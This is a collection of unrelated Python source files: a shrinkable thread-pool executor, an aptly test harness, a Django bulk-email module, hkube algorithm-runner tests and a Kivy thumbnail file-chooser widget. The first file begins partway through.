class _CustomThread(threading.Thread, LoggerMixin, LoggerLevelSetterMixin):
_lock_for_judge_threads_free_count = threading.Lock()
def __init__(self, executorx: ThreadPoolExecutorShrinkAble):
super().__init__()
self._executorx = executorx
def _remove_thread(self, stop_resson=''):
# noinspection PyUnresolvedReferences
self.logger.debug(f'停止线程 {self._ident}, 触发条件是 {stop_resson} ')
self._executorx._change_threads_free_count(-1)
self._executorx._threads.remove(self)
_threads_queues.pop(self)
# noinspection PyProtectedMember
def run(self):
# noinspection PyUnresolvedReferences
self.logger.debug(f'新启动线程 {self._ident} ')
self._executorx._change_threads_free_count(1)
while True:
try:
work_item = self._executorx.work_queue.get(block=True, timeout=self._executorx.KEEP_ALIVE_TIME)
except queue.Empty:
# continue
# self._remove_thread()
with self._lock_for_judge_threads_free_count:
if self._executorx.threads_free_count > self._executorx.MIN_WORKERS:
self._remove_thread(
f'{ self._executorx.pool_ident} 线程池中的 {self.ident} 线程 超过 {self._executorx.KEEP_ALIVE_TIME} 秒没有任务,线程池中不在工作状态中的线程数量是 '
f'{self._executorx.threads_free_count},超过了指定的最小核心数量 {self._executorx.MIN_WORKERS}')
break # 退出while 1,即是结束。这里才是决定线程结束销毁,_remove_thread只是个名字而已,不是由那个来销毁线程。
else:
continue
if work_item is not None:
self._executorx._change_threads_free_count(-1)
work_item.run()
del work_item
self._executorx._change_threads_free_count(1)
continue
if _shutdown or self._executorx._shutdown:
self._executorx.work_queue.put(None)
break
process_name_set = set()
logger_show_current_threads_num = LogManager('show_current_threads_num').get_logger_and_add_handlers(
formatter_template=5, log_filename='show_current_threads_num.log', do_not_use_color_handler=False)
def show_current_threads_num(sleep_time=600, process_name='', block=False, daemon=True):
process_name = sys.argv[0] if process_name == '' else process_name
def _show_current_threads_num():
while True:
# logger_show_current_threads_num.info(f'{process_name} 进程 的 并发数量是 --> {threading.active_count()}')
# nb_print(f' {process_name} {os.getpid()} 进程 的 线程数量是 --> {threading.active_count()}')
logger_show_current_threads_num.info(
f' {process_name} {os.getpid()} 进程 的 线程数量是 --> {threading.active_count()}')
time.sleep(sleep_time)
if process_name not in process_name_set:
if block:
_show_current_threads_num()
else:
t = threading.Thread(target=_show_current_threads_num, daemon=daemon)
t.start()
process_name_set.add(process_name)
def get_current_threads_num():
return threading.active_count()
if __name__ == '__main__':
show_current_threads_num(sleep_time=5)
def f1(a):
time.sleep(0.2) # 可修改这个数字测试多线程数量调节功能。
nb_print(f'{a} 。。。。。。。')
return a * 10
# raise Exception('抛个错误测试') # 官方的不会显示函数出错你,你还以为你写的代码没毛病呢。
pool = ThreadPoolExecutorShrinkAble(200)
# pool = ThreadPoolExecutor(200) # 测试对比官方自带
for i in range(30):
time.sleep(0.05) # 这里的间隔时间模拟,当任务来临不密集,只需要少量线程就能搞定f1了,因为f1的消耗时间短,
# 不需要开那么多线程,CustomThreadPoolExecutor比ThreadPoolExecutor 优势之一。
futurex = pool.submit(f1, i)
# print(futurex.result())
# 1/下面测试阻塞主线程退出的情况。注释掉可以测主线程退出的情况。
# 2/此代码可以证明,在一段时间后,连续长时间没任务,官方线程池的线程数目还是保持在最大数量了。而此线程池会自动缩小,实现了java线程池的keppalivetime功能。
time.sleep(1000000)
|
lib.py
|
"""
Test library.
"""
import difflib
import inspect
import json
import subprocess
import os
import posixpath
import shlex
import shutil
import string
import threading
import urllib
import pprint
import SocketServer
import SimpleHTTPServer
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
class FileHTTPServerRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def translate_path(self, path):
"""Translate a /-separated PATH to the local filename syntax.
Components that mean special things to the local file system
(e.g. drive or directory names) are ignored. (XXX They should
probably be diagnosed.)
"""
# abandon query parameters
path = path.split('?', 1)[0]
path = path.split('#', 1)[0]
path = posixpath.normpath(urllib.unquote(path))
words = path.split('/')
words = filter(None, words)
path = self.rootPath
for word in words:
drive, word = os.path.splitdrive(word)
head, word = os.path.split(word)
if word in (os.curdir, os.pardir):
continue
path = os.path.join(path, word)
return path
def log_message(self, format, *args):
pass
class BaseTest(object):
"""
Base class for all tests.
"""
longTest = False
fixturePool = False
fixturePoolCopy = False
fixtureDB = False
fixtureGpg = False
fixtureWebServer = False
expectedCode = 0
configFile = {
"rootDir": "%s/.aptly" % os.environ["HOME"],
"downloadConcurrency": 4,
"downloadSpeedLimit": 0,
"architectures": [],
"dependencyFollowSuggests": False,
"dependencyFollowRecommends": False,
"dependencyFollowAllVariants": False,
"dependencyFollowSource": False,
"gpgDisableVerify": False,
"gpgDisableSign": False,
"ppaDistributorID": "ubuntu",
"ppaCodename": "",
}
configOverride = {}
environmentOverride = {}
fixtureDBDir = os.path.join(os.environ["HOME"], "aptly-fixture-db")
fixturePoolDir = os.path.join(os.environ["HOME"], "aptly-fixture-pool")
fixtureGpgKeys = ["debian-archive-keyring.gpg",
"launchpad.key",
"flat.key",
"pagerduty.key",
"nvidia.key",
"jenkins.key"]
outputMatchPrepare = None
captureResults = False
def test(self):
self.prepare()
self.run()
self.check()
def prepare_remove_all(self):
if os.path.exists(os.path.join(os.environ["HOME"], ".aptly")):
shutil.rmtree(os.path.join(os.environ["HOME"], ".aptly"))
if os.path.exists(os.path.join(os.environ["HOME"], ".aptly.conf")):
os.remove(os.path.join(os.environ["HOME"], ".aptly.conf"))
if os.path.exists(os.path.join(os.environ["HOME"], ".gnupg", "aptlytest.gpg")):
os.remove(os.path.join(os.environ["HOME"], ".gnupg", "aptlytest.gpg"))
def prepare_default_config(self):
cfg = self.configFile.copy()
cfg.update(**self.configOverride)
f = open(os.path.join(os.environ["HOME"], ".aptly.conf"), "w")
f.write(json.dumps(cfg))
f.close()
def fixture_available(self):
if self.fixturePool and not os.path.exists(self.fixturePoolDir):
return False
if self.fixtureDB and not os.path.exists(self.fixtureDBDir):
return False
return True
def prepare_fixture(self):
if self.fixturePool:
os.makedirs(os.path.join(os.environ["HOME"], ".aptly"), 0755)
os.symlink(self.fixturePoolDir, os.path.join(os.environ["HOME"], ".aptly", "pool"))
if self.fixturePoolCopy:
os.makedirs(os.path.join(os.environ["HOME"], ".aptly"), 0755)
shutil.copytree(self.fixturePoolDir, os.path.join(os.environ["HOME"], ".aptly", "pool"), ignore=shutil.ignore_patterns(".git"))
if self.fixtureDB:
shutil.copytree(self.fixtureDBDir, os.path.join(os.environ["HOME"], ".aptly", "db"))
if self.fixtureWebServer:
self.webServerUrl = self.start_webserver(os.path.join(os.path.dirname(inspect.getsourcefile(self.__class__)),
self.fixtureWebServer))
if self.fixtureGpg:
self.run_cmd(["gpg", "--no-default-keyring", "--trust-model", "always", "--batch", "--keyring", "aptlytest.gpg", "--import"] +
[os.path.join(os.path.dirname(inspect.getsourcefile(BaseTest)), "files", key) for key in self.fixtureGpgKeys])
if hasattr(self, "fixtureCmds"):
for cmd in self.fixtureCmds:
self.run_cmd(cmd)
def run(self):
self.output = self.output_processor(self.run_cmd(self.runCmd, self.expectedCode))
def _start_process(self, command, stderr=subprocess.STDOUT, stdout=None):
if not hasattr(command, "__iter__"):
params = {
'files': os.path.join(os.path.dirname(inspect.getsourcefile(BaseTest)), "files"),
'changes': os.path.join(os.path.dirname(inspect.getsourcefile(BaseTest)), "changes"),
'udebs': os.path.join(os.path.dirname(inspect.getsourcefile(BaseTest)), "udebs"),
'testfiles': os.path.join(os.path.dirname(inspect.getsourcefile(self.__class__)), self.__class__.__name__),
'aptlyroot': os.path.join(os.environ["HOME"], ".aptly"),
}
if self.fixtureWebServer:
params['url'] = self.webServerUrl
command = string.Template(command).substitute(params)
command = shlex.split(command)
environ = os.environ.copy()
environ["LC_ALL"] = "C"
environ.update(self.environmentOverride)
return subprocess.Popen(command, stderr=stderr, stdout=stdout, env=environ)
def run_cmd(self, command, expected_code=0):
try:
proc = self._start_process(command, stdout=subprocess.PIPE)
output, _ = proc.communicate()
if proc.returncode != expected_code:
raise Exception("exit code %d != %d (output: %s)" % (proc.returncode, expected_code, output))
return output
except Exception, e:
raise Exception("Running command %s failed: %s" % (command, str(e)))
def gold_processor(self, gold):
return gold
def output_processor(self, output):
return output
def expand_environ(self, gold):
return string.Template(gold).substitute(os.environ)
def get_gold_filename(self, gold_name="gold"):
return os.path.join(os.path.dirname(inspect.getsourcefile(self.__class__)), self.__class__.__name__ + "_" + gold_name)
def get_gold(self, gold_name="gold"):
return self.gold_processor(open(self.get_gold_filename(gold_name), "r").read())
def check_output(self):
try:
self.verify_match(self.get_gold(), self.output, match_prepare=self.outputMatchPrepare)
except: # noqa: E722
if self.captureResults:
if self.outputMatchPrepare is not None:
self.output = self.outputMatchPrepare(self.output)
with open(self.get_gold_filename(), "w") as f:
f.write(self.output)
else:
raise
def check_cmd_output(self, command, gold_name, match_prepare=None, expected_code=0):
output = self.run_cmd(command, expected_code=expected_code)
try:
self.verify_match(self.get_gold(gold_name), output, match_prepare)
except: # noqa: E722
if self.captureResults:
if match_prepare is not None:
output = match_prepare(output)
with open(self.get_gold_filename(gold_name), "w") as f:
f.write(output)
else:
raise
def read_file(self, path):
with open(os.path.join(os.environ["HOME"], ".aptly", path), "r") as f:
return f.read()
def delete_file(self, path):
os.unlink(os.path.join(os.environ["HOME"], ".aptly", path))
def check_file_contents(self, path, gold_name, match_prepare=None):
contents = self.read_file(path)
try:
self.verify_match(self.get_gold(gold_name), contents, match_prepare=match_prepare)
except: # noqa: E722
if self.captureResults:
if match_prepare is not None:
contents = match_prepare(contents)
with open(self.get_gold_filename(gold_name), "w") as f:
f.write(contents)
else:
raise
def check_file(self):
contents = open(self.checkedFile, "r").read()
try:
self.verify_match(self.get_gold(), contents)
except: # noqa: E722
if self.captureResults:
with open(self.get_gold_filename(), "w") as f:
f.write(contents)
else:
raise
def check_exists(self, path):
if not os.path.exists(os.path.join(os.environ["HOME"], ".aptly", path)):
raise Exception("path %s doesn't exist" % (path, ))
def check_not_exists(self, path):
if os.path.exists(os.path.join(os.environ["HOME"], ".aptly", path)):
raise Exception("path %s exists" % (path, ))
def check_file_not_empty(self, path):
if os.stat(os.path.join(os.environ["HOME"], ".aptly", path))[6] == 0:
raise Exception("file %s is empty" % (path, ))
def check_equal(self, a, b):
if a != b:
self.verify_match(a, b, match_prepare=pprint.pformat)
def check_ge(self, a, b):
if not a >= b:
raise Exception("%s is not greater or equal to %s" % (a, b))
def check_gt(self, a, b):
if not a > b:
raise Exception("%s is not greater to %s" % (a, b))
def check_in(self, item, l):
if item not in l:
raise Exception("item %r not in %r", item, l)
def check_subset(self, a, b):
diff = ''
for k, v in a.items():
if k not in b:
diff += "unexpected key '%s'\n" % (k,)
elif b[k] != v:
diff += "wrong value '%s' for key '%s', expected '%s'\n" % (v, k, b[k])
if diff:
raise Exception("content doesn't match:\n" + diff)
def verify_match(self, a, b, match_prepare=None):
if match_prepare is not None:
a = match_prepare(a)
b = match_prepare(b)
if a != b:
diff = "".join(difflib.unified_diff([l + "\n" for l in a.split("\n")], [l + "\n" for l in b.split("\n")]))
raise Exception("content doesn't match:\n" + diff + "\n")
check = check_output
def prepare(self):
self.prepare_remove_all()
self.prepare_default_config()
self.prepare_fixture()
def start_webserver(self, directory):
FileHTTPServerRequestHandler.rootPath = directory
self.webserver = ThreadedTCPServer(("localhost", 0), FileHTTPServerRequestHandler)
server_thread = threading.Thread(target=self.webserver.serve_forever)
server_thread.daemon = True
server_thread.start()
return "http://%s:%d/" % self.webserver.server_address
def shutdown(self):
if hasattr(self, 'webserver'):
self.shutdown_webserver()
def shutdown_webserver(self):
self.webserver.shutdown()
@classmethod
def shutdown_class(cls):
pass
|
emails.py
|
"""
Email module
"""
# Threading
import threading
from django.core.mail import message
# Email
from ....settings.base import EMAIL_HOST_USER
from django.core.mail.message import (
EmailMultiAlternatives,
)
from django.utils.module_loading import import_string
# Templates
from django.core.mail import send_mail, send_mass_mail
from django.template.loader import get_template
# Settings
from ....settings import base as settings
# Site
from django.contrib.sites.models import Site
SINGLE_EMAIL_LIMIT = 2
# Message generation
def generateInscriptionAlertMessage(name, activity, inscription):
context = {
'name': name,
'activity_title': activity.title,
'activity': activity,
'inscription': inscription,
'domain': Site.objects.get_current().domain,
}
template = get_template('emails/inscriptionAlert.html')
content = template.render(context)
return content
def generateBroadcastMessage(broadcast):
context = {
'broadcast': broadcast,
'domain': Site.objects.get_current().domain,
}
template = get_template('emails/broadcast.html')
content = template.render(context)
return content
def generateStatusReportMessage(messages_dict):
context = {
'messages': messages_dict,
}
template = get_template('emails/statusreport.html')
content = template.render(context)
return content
# Backend
def generateDatatuple(recipent_list, subject, message):
# for sending massive emails
# format: subject, message, sender, reciever list
datatuple = (subject, message, settings.EMAIL_HOST_USER, recipent_list)
return datatuple
def get_connection(backend=None, fail_silently=False, **kwds):
"""Load an email backend and return an instance of it.
If backend is None (default) settings.EMAIL_BACKEND is used.
Both fail_silently and other keyword arguments are used in the
constructor of the backend.
"""
klass = import_string(backend or settings.EMAIL_BACKEND)
return klass(fail_silently=fail_silently, **kwds)
def sendMassiveHtmlEmails(datatuple, fail_silently=False, auth_user=None,
auth_password=None, connection=None):
"""
Given a datatuple of (subject, message, html_message, from_email,
recipient_list), send each message to each recipient list.
Return the number of emails sent.
If from_email is None, use the DEFAULT_FROM_EMAIL setting.
If auth_user and auth_password are set, use them to log in.
If auth_user is None, use the EMAIL_HOST_USER setting.
If auth_password is None, use the EMAIL_HOST_PASSWORD setting.
"""
connection = connection or get_connection(
username=auth_user,
password=auth_password,
fail_silently=fail_silently,
)
plain_text_message = ''
messages = []
step = 100
email_list_length = len(datatuple[3])
for j in range(0, email_list_length, step):
if j + step > email_list_length:
bcc_recipents = datatuple[3][j:]
else:
bcc_recipents = datatuple[3][j:j + step]
message = EmailMultiAlternatives(datatuple[0], plain_text_message, datatuple[2],
alternatives=[(datatuple[1], 'text/html')],
connection=connection,
bcc=bcc_recipents)
messages.append(message)
connection.send_messages(messages)
return
def sendMassiveEmails(addressee_list, subject, message): # Do not use this function directly
data = (subject, message, EMAIL_HOST_USER, addressee_list)
"""send_mass_mail(
(data,),
fail_silently=False,
)"""
for email in addressee_list:
send_mail(
data[0],
data[1],
data[2],
[email],
fail_silently=False,
html_message=message
)
return True
def startSendEmails(addressee_list, message, subject='Información Gepian'):
print('---- Threads before sending:', threading.active_count())
if len(addressee_list) > SINGLE_EMAIL_LIMIT:
datatuple = generateDatatuple(addressee_list, subject, message)
email_thread = threading.Thread(target=sendMassiveHtmlEmails, args=(datatuple,))
else:
email_thread = threading.Thread(target=sendMassiveEmails, args=(addressee_list, subject, message))
email_thread.start()
#email_thread.join()
# sendMassiveEmails(addressee_list, message)
print('---- Sending {0} emails...'.format(len(addressee_list)))
return True
|
test_wrapper.py
|
import os
import time
import pytest
# from mock import patch
from time import sleep
from threading import Thread
from hkube_python_wrapper.communication.streaming.StreamingManager import StreamingManager
from hkube_python_wrapper import Algorunner
from tests.configs import config
from tests.mocks import mockdata
from hkube_python_wrapper.codeApi.hkube_api import HKubeApi
oneMB = 1024 * 1024
class Algorithm(object):
pass
def startCallbackBytes(args):
return bytearray(b'\xdd' * (1 * oneMB))
def startCallback(args):
return args["input"]["input"][0]
def test_load_algorithm_callbacks():
algorunner = Algorunner()
algorunner.loadAlgorithmCallbacks(startCallback, options=config)
result1 = algorunner._originalAlgorithm['start']({'input': mockdata.initData}, None)
result2 = startCallback({'input': mockdata.initData})
assert result1 == result2
algorunner.close()
def test_load_algorithm_streaming_then_batch():
algorunner = Algorunner()
algorunner.loadAlgorithmCallbacks(startCallback, options=config)
algorunner.streamingManager = StreamingManager()
algorunner._hkubeApi = HKubeApi(None, algorunner, None, None,algorunner.streamingManager)
algorunner._init(mockdata.streamingInitData)
thrd = Thread(target=algorunner._originalAlgorithm['start'], args=[{'input': mockdata.streamingInitData}, algorunner._hkubeApi])
thrd.start()
algorunner._stopAlgorithm(mockdata.initData)
result1 = algorunner._originalAlgorithm['start']({'input': mockdata.initData}, algorunner._hkubeApi)
result2 = startCallback({'input': mockdata.initData})
assert result1 == result2
algorunner.close()
def xtest_exit():
with patch('sys.exit') as exit_mock:
def doExit(a):
status['exit'] = True
def invokeExit():
algorunner._exit(None)
def isServingTrue():
return True
def isServingFalse():
return False
algorunner = Algorunner()
algorunner.loadAlgorithmCallbacks(startCallback)
algorunner.connectToWorker(config)
sleep(1)
status = {'exit': False}
algorunner.loadAlgorithmCallbacks(startCallback, exit=doExit)
algorunner._dataServer.isServing = isServingTrue
Thread(target=invokeExit).start()
sleep(1)
assert status['exit'] == False
algorunner._dataServer.isServing = isServingFalse
sleep(1)
assert status['exit'] == True
assert exit_mock.called
def test_failed_load_algorithm():
alg = Algorithm()
alg.algorithm = {
"path": "no_such_path",
"entryPoint": "main.py"
}
algorunner = Algorunner()
algorunner.loadAlgorithm(alg)
assert "No module named" in algorunner._loadAlgorithmError
assert "no_such_path" in algorunner._loadAlgorithmError
algorunner.close()
def xtest_load_algorithm():
alg = Algorithm()
alg.algorithm = {
"path": "test_alg",
"entryPoint": "main.py"
}
cwd = os.getcwd()
os.chdir(cwd + '/tests')
algorunner = Algorunner()
algorunner.loadAlgorithm(alg)
# os.chdir(cwd)
result1 = algorunner._originalAlgorithm['start']({'input': mockdata.initData}, None)
result2 = startCallback({'input': mockdata.initData})
assert result1 == result2
@pytest.mark.parametrize("test_input,expected", [
('main.py','main'),
('main','main'),
('foo.bar.main.py','foo.bar.main'),
('foo.bar.main','foo.bar.main'),
('foo/bar/main.py','foo.bar.main'),
('foo/bar/main','foo.bar.main'),
])
def test_entryPoint(test_input,expected):
actual = Algorunner._getEntryPoint(test_input)
assert actual == expected
def startCallback2(args):
return args["input"][0]
def test_connect_to_worker():
config.discovery.update({"port": "9021"})
algorunner = Algorunner()
algorunner.loadAlgorithmCallbacks(startCallback2, options=config)
algorunner.connectToWorker(config)
time.sleep(2)
assert algorunner._connected == True
assert algorunner._input == mockdata.initData
algorunner.close()
|
__init__.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""StudioFileChooserThumbView
====================
The StudioFileChooserThumbView widget is similar to FileChooserIconView,
but if possible it shows a thumbnail instead of a normal icon.
Usage
-----
You can set some properties in order to control its performance:
* **showthumbs:** Thumbnail limit. If set to a number > 0, it will show the
thumbnails only if the directory doesn't contain more files or directories.
If set to 0 it won't show any thumbnail. If set to a number < 0 it will always
show the thumbnails, regardless of how many items the current directory
contains. By default it is set to -1, so it will show all the thumbnails.
* **thumbdir:** Custom directory for the thumbnails. By default it uses
tempfile to generate it randomly.
* **thumbsize:** The size of the thumbnails. It defaults to 64d
"""
# Thanks to allan-simon for making the code more readable and less "spaghetti" :)
import os
from os.path import abspath, dirname
import mimetypes
#(enable for debugging)
import traceback
import shutil
import subprocess
from threading import Thread
from os.path import join, exists, dirname
from tempfile import mktemp, mkdtemp
from kivy.app import App
from kivy.lang import Builder
from kivy.metrics import dp
from kivy.utils import QueryDict
from kivy.properties import StringProperty
from kivy.properties import DictProperty
from kivy.properties import ObjectProperty
from kivy.properties import BooleanProperty
from kivy.properties import NumericProperty
from kivy.uix.filechooser import FileChooserController
from kivy.uix.behaviors import FocusBehavior
from kivy.uix.stacklayout import StackLayout
from kivy.uix.gridlayout import GridLayout
from kivystudio.behaviors import HighlightBehavior
# directory with this package
_path = os.path.dirname(os.path.realpath(__file__))
Builder.load_string("""
#: import Clock kivy.clock.Clock
<StudioFileChooserThumbView>:
stacklayout: stacklayout
on_entry_added: stacklayout.add_widget(args[1])
on_entries_cleared: stacklayout.clear_widgets()
scrollview: scrollview
ScrollView:
id: scrollview
FileStack_:
id: stacklayout
filechooser: root
width: scrollview.width
size_hint_y: None
height: self.minimum_height
spacing: '10dp'
padding: '10dp'
highlighted_shape: 'rounded_rectangle'
highlight_orientation: 'grid'
auto_scroll_to: True
on_size: Clock.schedule_once(lambda dt: setattr(self, 'grid_len', int(self.width/(self.children[0].width+10))), 1)
[StudioFileThumbEntry@IconWidget_]:
image: image
locked: False
path: ctx.path
selected: self.path in ctx.controller().selection
size_hint: None, None
cols: 1
size: ctx.controller().thumbsize + dp(52), self.minimum_height
on_double_tap: ctx.controller().entry_released(self, args[1])
canvas:
Color:
rgba: 1, 1, 1, 1 if self.selected else 0
BorderImage:
border: 8, 8, 8, 8
pos: root.pos
size: root.size
source: 'atlas://data/images/defaulttheme/filechooser_selected'
AsyncImage:
id: image
size_hint: 1, None
size: ctx.controller().thumbsize, ctx.controller().thumbsize
# pos: root.x + dp(24), root.y + dp(40)
Label:
size_hint: 1, None
text: ctx.name
text_size: (ctx.controller().thumbsize + dp(20), None)
halign: 'center'
size: ctx.controller().thumbsize + dp(10), self.texture_size[1]
color: 0,0,0,1
valign: 'top'
shorten_from: 'right'
<IconWidget_>:
""")
DEFAULT_THEME = 'atlas://data/images/defaulttheme/'
FILE_ICON = DEFAULT_THEME + 'filechooser_file'
FOLDER_ICON = DEFAULT_THEME + 'filechooser_folder'
UNKWON_ICON=DEFAULT_THEME + 'filechooser_file'
ICON_PATH = dirname(dirname(__file__)) + '/file_formats/'
MP3_ICON = ICON_PATH + 'music.png'
VIDEO_ICON = ICON_PATH + 'video.png'
PYTHON_ICON = ICON_PATH + 'python.png'
KV_ICON = ICON_PATH + 'kv.png'
JAVA_ICON = ICON_PATH + 'java.png'
PDF_ICON = ICON_PATH + 'pdf.png'
ARCHIVE_ICON = ICON_PATH + 'archive.png'
# UNKWON_ICON = '.png'
ARCHIVES_MIME = ('application/zip', 'application/x-tar',)
APK_MIME = 'application/vnd.android.package-archive'
EXE_MIME = 'application/x-msdos-program'
PDF_MIME = 'application/pdf'
##############################
FLAC_MIME = "audio/flac"
MP3_MIME = "audio/mpeg"
PYTHON_MIME = "text/x-python"
JAVA_MIME = "text/x-java"
AVCONV_BIN = 'avconv'
FFMPEG_BIN = 'ffmpeg'
CONVERT_BIN = 'convert'
class IconWidget_(GridLayout):
'Internal widget used to display files'
def __init__(self, **kwargs):
super(IconWidget_, self).__init__(**kwargs)
self.register_event_type('on_double_tap')
def on_touch_down(self, touch):
if self.collide_point(*touch.pos):
if touch.is_double_tap:
self.dispatch('on_double_tap', touch)
return True
else:
self.parent.set_highlighted(self)
return True
return super(IconWidget_, self).on_touch_down(touch)
def on_double_tap(self, touch):
if os.path.isfile(self.path):
self.parent.parent.parent.dispatch('on_file_select', self.path)
class FileStack_(HighlightBehavior, FocusBehavior, StackLayout):
# overiding enter from highlightbehavior
def do_enter(self):
new_path = self.current_highlighted_child.path
if os.path.isdir(new_path):
if new_path=='../': # move back
new_path = os.path.dirname(self.filechooser.path)
self.filechooser.path = new_path
elif os.path.isfile(new_path):
self.filechooser.dispatch('on_file_select', new_path)
class StudioFileChooserThumbView(FileChooserController):
'''Implementation of :class:`FileChooserController` using an icon view
with thumbnails.
'''
_ENTRY_TEMPLATE = 'StudioFileThumbEntry'
thumbdir = StringProperty(mkdtemp(prefix="kivy-", suffix="-thumbs"))
'''Custom directory for the thumbnails. By default it uses tempfile to
generate it randomly.
'''
showthumbs = NumericProperty(-1)
'''Thumbnail limit. If set to a number > 0, it will show the thumbnails
only if the directory doesn't contain more files or directories. If set
to 0 it won't show any thumbnail. If set to a number < 0 it will always
show the thumbnails, regardless of how many items the current directory
contains.
By default it is set to -1, so it will show all the thumbnails.
'''
thumbsize = NumericProperty(dp(64))
"""The size of the thumbnails. It defaults to 64dp.
"""
play_overlay = StringProperty(os.path.join(_path, 'play_overlay.png'))
"""Path to a PIL supported image file (e.g. png) that will be put over
videos thumbnail (e.g. a "play" button). If it's an empty string nothing
will happen.
Defaults to "".
"""
stacklayout = ObjectProperty(None)
filmstrip_left = StringProperty("")
filmstrip_right = StringProperty("")
_thumbs = DictProperty({})
scrollview = ObjectProperty(None)
def __init__(self, **kwargs):
super(StudioFileChooserThumbView, self).__init__(**kwargs)
self.register_event_type('on_file_select')
self.thumbnail_generator = ThreadedThumbnailGenerator()
if not exists(self.thumbdir):
os.mkdir(self.thumbdir)
def clear_cache(self, *args):
try:
shutil.rmtree(self.thumbdir, ignore_errors=True)
except:
traceback.print_exc()
def _dir_has_too_much_files(self, path):
if (self.showthumbs < 0):
return False
nbrFileInDir = len(
os.listdir(dirname(path))
)
return nbrFileInDir > self.showthumbs
def _create_entry_widget(self, ctx):
# instantiate the widget
widget = super(StudioFileChooserThumbView, self)._create_entry_widget(ctx)
kctx = QueryDict(ctx)
# default icon
widget.image.source = FOLDER_ICON if kctx.isdir else UNKWON_ICON
# schedule generation for later execution
self.thumbnail_generator.append(widget.image, kctx, self._get_image)
self.thumbnail_generator.run()
return widget
def _get_image(self, ctx):
try:
App.get_running_app().bind(on_stop=self.clear_cache)
except AttributeError:
pass
except:
traceback.print_exc()
if ctx.isdir:
return FOLDER_ICON
# if the directory contains more files
# than what has been configurated
# we directly return a default file icon
if self._dir_has_too_much_files(ctx.path):
return FILE_ICON
try:
mime = get_mime(ctx.name)
# if we already have generated the thumb
# for this file, we get it directly from our
# cache
if ctx.path in self._thumbs.keys():
return self._thumbs[ctx.path]
# if it's a picture, we don't need to do
# any transormation
if is_picture(mime, ctx.name):
return ctx.path
# for mp3/flac an image can be embedded
# into the file, so we try to get it
if mime == MP3_MIME:
return self._generate_image_from_mp3(
ctx.path
)
if mime == FLAC_MIME:
return self._generate_image_from_flac(
ctx.path
)
if mime == PYTHON_MIME:
return PYTHON_ICON
if mime == JAVA_MIME:
return JAVA_ICON
if mime in ARCHIVES_MIME:
return ARCHIVE_ICON
if mime == PDF_MIME:
return PDF_ICON
# if it's a video we will extract a frame out of it
if "video/" in mime:
return self._generate_image_from_video(ctx.path)
extention = os.path.splitext(ctx.name)[1]
if extention == '.kv':
return KV_ICON
except:
traceback.print_exc()
return FILE_ICON
return FILE_ICON
def _generate_image_from_flac(self, flacPath):
# if we don't have the python module to
# extract image from flac, we just return
# default file's icon
try:
from mutagen.flac import FLAC
except ImportError:
return FILE_ICON
try:
audio = FLAC(flacPath)
art = audio.pictures
return self._generate_image_from_art(
art,
flacPath
)
except(IndexError, TypeError):
return FILE_ICON
def _generate_image_from_mp3(self, mp3Path):
# if we don't have the python module to
# extract image from mp3, we just return
# default file's icon
try:
from mutagen.id3 import ID3
except ImportError:
return MP3_ICON
try:
audio = ID3(mp3Path)
art = audio.getall("APIC")
return self._generate_image_from_art(
art,
mp3Path
)
except(IndexError, TypeError):
return MP3_ICON
def _generate_image_from_art(self, art, path):
pix = pix_from_art(art)
ext = mimetypes.guess_extension(pix.mime)
if ext == 'jpe':
ext = 'jpg'
image = self._generate_image_from_data(
path,
ext,
pix.data
)
self._thumbs[path] = image
return image
def _gen_temp_file_name(self, extension):
return join(self.thumbdir, mktemp()) + extension
def _generate_image_from_data(self, path, extension, data):
# data contains the raw bytes
# we save it inside a file, and return this file's temporary path
image = self._gen_temp_file_name(extension)
with open(image, "w") as img:
img.write(data)
return image
def _generate_image_from_video(self, videoPath):
# we try to use an external software (avconv or ffmpeg)
# to get a frame as an image, otherwise => default file icon
data = extract_image_from_video(videoPath, self.thumbsize, self.play_overlay)
try:
if data:
return self._generate_image_from_data(
videoPath,
".png",
data)
else:
return VIDEO_ICON
except:
traceback.print_exc()
return VIDEO_ICON
def _gen_label(self, ctx):
size = ctx.get_nice_size()
temp = ""
try:
temp = os.path.splitext(ctx.name)[1][1:].upper()
except IndexError:
pass
if ctx.name.endswith(".tar.gz"):
temp = "TAR.GZ"
if ctx.name.endswith(".tar.bz2"):
temp = "TAR.BZ2"
if temp == "":
label = size
else:
label = size + " - " + temp
return label
def on_file_select(self, path):
pass
class ThreadedThumbnailGenerator(object):
"""
Class that runs thumbnail generators in a another thread and
asynchronously updates image widgets
"""
def __init__(self):
self.thumbnail_queue = []
self.thread = None
def append(self, widget, ctx, func):
self.thumbnail_queue.append([widget, ctx, func])
def run(self):
if self.thread is None or not self.thread.isAlive():
self.thread = Thread(target=self._loop)
self.thread.start()
def _loop(self):
while len(self.thumbnail_queue) != 0:
# call user function that generates the thumbnail
image, ctx, func = self.thumbnail_queue.pop(0)
image.source = func(ctx)
# test if the file is a supported picture
# file
def is_picture(mime, name):
if mime is None:
return False
return "image/" in mime and (
"jpeg" in mime or
"jpg" in mime or
"gif" in mime or
"png" in mime
) and not name.endswith(".jpe")
def pix_from_art(art):
pix = None
if len(art) == 1:
pix = art[0]
elif len(art) > 1:
for pic in art:
if pic.type == 3:
pix = pic
if not pix:
# This would raise an exception if no image is present,
# and the default one would be returned
pix = art[0]
return pix
def get_mime(fileName):
try:
mime = mimetypes.guess_type(fileName)[0]
if mime is None:
return ""
return mime
except TypeError:
return ""
return ""
def extract_image_from_video(path, size, play_overlay):
data = None
if exec_exists(AVCONV_BIN):
data = get_png_from_video(AVCONV_BIN, path, int(size), play_overlay)
elif exec_exists(FFMPEG_BIN):
data = get_png_from_video(FFMPEG_BIN, path, int(size), play_overlay)
return data
# generic function to call a software to extract a PNG
# from an video file, it return the raw bytes, not an
# image file
def get_png_from_video(software, video_path, size, play_overlay):
return subprocess.Popen(
[
software,
'-i',
video_path,
'-i',
play_overlay,
'-filter_complex',
'[0]scale=-1:' + str(size) + '[video],[1]scale=-1:' + str(size) + '[over],' +
'[video][over]overlay=(main_w-overlay_w)/2:(main_h-overlay_h)/2',
'-an',
'-vcodec',
'png',
'-vframes',
'1',
'-ss',
'00:00:01',
'-y',
'-f',
'rawvideo',
'-'
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
).communicate()[0]
def stack_images(software, bg, fg, out):
# You need ImageMagick to stack one image onto another
p = subprocess.Popen([software, bg, "-gravity", "Center", fg, "-compose", "Over", "-composite", out])
p.wait()
def exec_exists(bin):
try:
subprocess.check_output(["which", bin])
return True
except subprocess.CalledProcessError:
return False
